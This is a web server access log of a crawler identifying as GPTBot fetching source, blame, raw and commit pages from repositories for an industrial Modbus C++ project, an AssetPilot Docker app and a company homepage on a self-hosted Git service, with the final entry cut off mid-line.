git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13336] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11599] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13925] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10685] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:15:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:15:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13925] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10684] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13104] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:15:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12775] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:15:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/README.md" [Client 74.7.227.38] [Length 11197] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" +[17/Feb/2026:15:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/App.tsx" [Client 74.7.227.38] [Length 9764] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" +[17/Feb/2026:15:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore?display=source" [Client 74.7.227.38] [Length 11120] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" +[17/Feb/2026:15:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13436] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" +[17/Feb/2026:15:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15185] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:15:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15368] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/claude.md" +[17/Feb/2026:15:38:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" +[17/Feb/2026:15:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13527] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:15:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11324] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" +[17/Feb/2026:15:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10561] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10564] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:38:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/README.md" +[17/Feb/2026:15:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/README.md" +[17/Feb/2026:15:38:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/README.md" +[17/Feb/2026:15:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/README.md" +[17/Feb/2026:15:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fCMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 48273] [Gzip 9.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTargetDirectories.txt" [Client 74.7.227.38] [Length 24902] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 25421] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" +[17/Feb/2026:15:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10846] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:15:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 10419] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" +[17/Feb/2026:15:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 11136] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:15:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 11061] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:15:38:17 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" +[17/Feb/2026:15:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15918] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:15:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:15:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr 